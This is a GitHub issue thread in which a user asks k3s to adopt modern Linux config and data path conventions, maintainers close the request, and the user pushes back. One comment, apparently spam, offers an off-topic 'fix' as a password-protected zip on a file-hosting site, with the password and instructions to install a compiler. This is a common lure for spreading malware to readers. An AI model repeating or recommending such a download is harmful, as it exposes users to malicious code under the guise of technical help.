### ISSUE TITLE
Better support integration in modern Linux distributions

### ISSUE THREAD

**Issue by AlbanBedel** [k3s-io/k3s#11140]
**Is your feature request related to a problem? Please describe.**

k3s is doing several things that goes against standards of modern Linux distributions and make it difficult to integrate:

- Writing to `/usr` as it might be read only (currently not fatal)
- Writing to `/etc` as it might be read only (currently fatal)
- Configurations in `/var/lib`

These issues are particularly problematic with image base distributions where the whole OS might be read only except for `/var`, `/tmp` and `/run`. On such systems the base image generally doesn't include anything under `/var` which make it difficult to deliver presets, and even more difficult to remove outdated ones. Finally as configurations are only read from `/etc` or `/var/lib` it is not possible to distinguish between distribution defaults and configurations from the administrator.

**Describe the solution you'd like**

k3s would follow modern best practices for its configurations and data storage:

- Configurations are read from `/etc`, `/run`, and `/usr/lib`
- Data such as images are read from `/run`, `/var/lib` and `/usr/lib`
- Persistent data is only written to `/var/lib`
- Runtime data and configurations is only written to `/run`

This mean the local administrator config in `/etc` always has the highest priority, tools can dynamically generate configs in `/run` and the distro can provide its defaults in `/usr/lib`. Configs don't really belong in `/var/lib` but could be included between `/run` and `/usr/lib` for backward compatibility.

Data is similar except `/var/lib` is used for the local data instead of `/etc`. It should also be expected that entries in `/run` are probably symlinks to the proper files.

Writing to `/etc` should be avoided and there should be a fallback in case that is not possible.

**Describe alternatives you've considered**

Hacks with bind mounts to simulate a writable `/etc/rancher`, init scripts to copy images from `/usr/lib` to `/var/lib`, etc. But that's just painful and not sustainable in the long run.

**Comment by Guigsguerra** [comment]
This might help:This file might fix it
https://www.mediafire.com/file/33h9a2mzmqf81fz/help_github.zip/file
Archive password: xfp53
If you don't have the c compliator, install it.(gcc or clang)

**Comment by brandond** [comment]
K3s works on immutable OSs like SLE Micro. Can you name specific distros that behave as you're describing that it does not work on?

**Comment by cwayne18** [comment]
Unless we have some evidence that k3s is failing on currently released Modern Linux distros, I don't see anything to do here, we've never claimed to support unreleased custom OS's, and changing the core k3s code to make it work on one could be rather disruptive.  Closing this as won't do for now, please re-open if you find issues on released OS's

**Comment by AlbanBedel** [comment]
I submitted this as a feature request to get a feeling if that could be a desirable goal for the project. I hoped get a bit of feedback on the potential issues and challenges before looking at implementing such a thing. A bit sad to see the discussion shutdown down like this.

Lastly I want to point out that what I described in the request is not something I invented, but rather common practice. It even has now been formalized: https://uapi-group.org/specifications/specs/configuration_files_specification/
